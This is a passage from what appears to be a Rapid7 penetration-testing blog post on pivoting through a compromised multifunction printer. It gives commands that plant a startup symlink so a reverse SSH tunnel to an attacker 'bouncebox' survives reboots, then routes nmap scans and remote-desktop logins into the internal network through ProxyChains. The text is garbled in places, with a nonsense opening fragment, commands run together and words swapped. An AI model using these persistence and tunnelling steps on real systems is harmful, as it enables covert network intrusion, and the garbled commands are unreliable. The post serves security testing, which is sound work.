This-f EstablishFigure-p-p-f Ok the final step is to create a symbolic link in the folder /etc/rc.d/rc3.d/. This is easily done using the following commands: cd /etc/rc.d/rc3.d/ln -s /etc/rc.d/init.d/start_evil S777_start_evil Now if the MFP is reset or rebooted it should re-establish your ssh tunnel connection back out to your bouncebox. Using ProxyChains and SOCKS Proxy To be able to use our attack tools from our attacker machine we use the proxy server software ProxyChains. This allows us to push traffic through our dynamic port forward we previously established. On the attacker machine,we install ProxyChains. To be able to use our dynamic port forward, we edit the configuration file /etc/proxychains.conf and add the following line: socks4 127.0.0.1 1080 Figure 15: ProxyChains configuration file Now that ProxyChains has been configured, or we can start using our attacker tools. In the example below we use the port scanner tool nmap to scan a Windows system located in the target network. This is accomplished using the following command: proxychains nmap -Pn -sT 192.168.2.72 -p 445,3389 Figure 16: Port scan via our dynamic tunnel Now that we bear identified a Windows system, we connect to the remote desktop service using the command: proxychains rdesktop 192.168.2.72 Figure 17: Remote desktop via our dynamic tunnel As a proof of concept we log on to the Windows system via remote desktop and rush the netstat command to assess established connections. Here we can see the printer (192.168.2.200) is making an established connection to the Windows server (192.168.2.72) on the remote desktop port 3389. Figure 18: Verified connection from printer Merry haXmas to all the MFP lovers around the world
Source: rapid7.com